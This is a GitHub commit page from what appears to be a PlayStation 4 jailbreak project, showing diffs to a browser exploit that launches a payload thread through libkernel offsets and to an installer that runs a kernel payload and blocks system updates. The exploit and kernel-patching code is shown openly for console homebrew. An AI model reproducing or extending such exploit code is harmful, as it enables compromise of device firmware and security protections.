Skip to content

Commit

Permalink
More stable payload
Browse files Browse the repository at this point in the history
  • Loading branch information
xvortex committed Feb 13, 2018
1 parent 83b1348 commit 907275b
Show file tree
Hide file tree
Showing 6 changed files with 16 additions and 35 deletions.
2 changes: 1 addition & 1 deletion exploit/fix.js

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

26 changes: 3 additions & 23 deletions exploit/index.html
Original file line number Diff line number Diff line change
Expand Up @@ -628,32 +628,12 @@
// Launch thread
var thread_id_ptr = malloc(0x08);
var thread_name = malloc(0x100);
var exit_code_ptr = malloc(0x08);

p.writeString(thread_name, "payload");

// run payload forever
for (;;)
{
var result = p.call(libkernel.add32(0x11570), thread_id_ptr, 0, code_addr, 0, thread_name);
print("scePthreadCreate: 0x" + result);
if (result == 0)
{
var thread_id = p.read8(thread_id_ptr);
print("thread: 0x" + thread_id);
var result = p.call(libkernel.add32(0x11610), thread_id, exit_code_ptr);

print("scePthreadJoin: 0x" + result);
if (result == 0)
{
var exit_code = p.read8(exit_code_ptr);
print("exit code: " + exit_code);
print("=== Done ===");
alert("Done");
break;
}
}
}
print("scePthreadCreate: 0x" + p.call(libkernel.add32(0x11570), thread_id_ptr, 0, code_addr, 0, thread_name));
print("thread: 0x" + p.read8(thread_id_ptr));
print("=== Done ===");
}
else
{
Expand Down
2 changes: 1 addition & 1 deletion exploit/payload.js

Large diffs are not rendered by default.

4 changes: 4 additions & 0 deletions installer/include/debug.h
Original file line number Diff line number Diff line change
@@ -1,6 +1,10 @@
#ifndef DEBUG_H
#define DEBUG_H

#define PRIx64 "llx"
#define PRIu64 "llu"
#define PRId64 "lld"

int sock;

void initDebugSocket(void);
Expand Down
3 changes: 2 additions & 1 deletion installer/include/defines.h
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
#ifndef __DEFINES
#define __DEFINES

#define VERSION "1.2"
#define VERSION "1.3"

//#define DEBUG_SOCKET

Expand Down Expand Up @@ -91,6 +91,7 @@ struct install_payload_args

struct kernel_payload_args
{
void* syscall_handler;
uint64_t user_arg;
};

Expand Down
14 changes: 5 additions & 9 deletions installer/source/main.c
Original file line number Diff line number Diff line change
Expand Up @@ -286,16 +286,9 @@ int kernel_payload(struct thread *td, struct kernel_payload_args* args)
static inline void patch_update(void)
{
unlink(PS4_UPDATE_FULL_PATH);

DIR* directory = opendir(PS4_UPDATE_TEMP_PATH);

if(directory != NULL)
{
closedir(directory);
return;
}

unlink(PS4_UPDATE_TEMP_PATH);

mkdir(PS4_UPDATE_FULL_PATH, 0777);
mkdir(PS4_UPDATE_TEMP_PATH, 0777);
}

Expand All @@ -305,6 +298,8 @@ int _main(struct thread *td) {
initKernel();
initLibc();

sceKernelSleep(1);

#ifdef DEBUG_SOCKET
initNetwork();
initDebugSocket();
Expand All @@ -327,6 +322,7 @@ int _main(struct thread *td) {
struct payload_info payload_info;
payload_info.buffer = payload_data;
payload_info.size = payload_size;

errno = 0;

result = kexec(&install_payload, &payload_info);
Expand Down

0 comments on commit 907275b

Please sign in to comment.